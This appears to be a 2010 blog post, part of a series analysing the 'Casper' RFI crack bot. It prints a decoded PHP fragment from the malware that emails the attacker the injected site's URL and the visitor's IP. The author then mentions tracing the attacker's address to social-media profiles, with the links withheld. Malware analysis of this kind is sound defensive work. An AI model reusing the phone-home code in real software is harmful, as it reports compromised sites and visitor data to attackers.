Irregular Expressions

Aug 27 2010   11:59AM GMT

Casper RFI crack bot – Part 8

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

We have one more to decode, $shell_data

$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
     $visitcount = 0;
     $visitor = $_SERVER["REMOTE_ADDR"];
     $web = $_SERVER["HTTP_HOST"];
     $inj = $_SERVER["REQUEST_URI"];
     $target = rawurldecode($web.$inj);
     $body = "Boss, there was an injected target on $target by $visitor";
     @mail("xxxxxx@gmail.com","Fx29Shell http://$target by $visitor", "$body");
     } else {
     $visitcount;
     }
     setcookie("visits",$visitcount);"

Good to know it phones home.

Well there is a few more places that mention that address, and what’s really interesting is that this guy appears to have his account on freindster.

http://profiles.friendster.com/xxxxxx

I am pretty certian that this is the guy, but it would not be nice to share this information. Kinda odd that he would use his real email address, maybe it’s an old one that he forgot was on freindster and out on the internets.

Humm, it also has another email address on his profile, it has a facebook account!

http://facebook.com/XXXXXXXX

Well that awesome, but what do you do with it?

(And there is a reason I did not post the links)

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: